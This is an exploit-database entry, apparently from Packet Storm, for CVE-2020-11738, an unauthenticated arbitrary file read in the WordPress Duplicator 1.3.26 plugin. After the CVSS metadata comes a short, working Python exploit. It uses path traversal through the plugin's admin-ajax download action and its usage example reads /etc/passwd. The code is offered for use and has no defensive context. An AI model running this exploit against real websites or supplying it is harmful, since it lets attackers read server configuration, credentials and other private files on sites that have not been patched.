WordPress Duplicator 1.3.26 Arbitrary File Read

2021-10-1800:00:00

nam3lum

packetstormsecurity.com

332

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

JSON

`# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read  
# Date: October 16, 2021  
# Exploit Author: nam3lum  
# Vendor Homepage: https://wordpress.org/plugins/duplicator/  
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]  
# Version: 1.3.26  
# Tested on: Ubuntu 16.04  
# CVE : CVE-2020-11738  
  
import requests as re  
import sys  
  
if len(sys.argv) != 3:  
print("Exploit made by nam3lum.")  
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")  
exit()  
  
arg = sys.argv[1]  
file = sys.argv[2]  
  
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file  
  
output = re.get(url = URL)  
print(output.text)  
  
  
`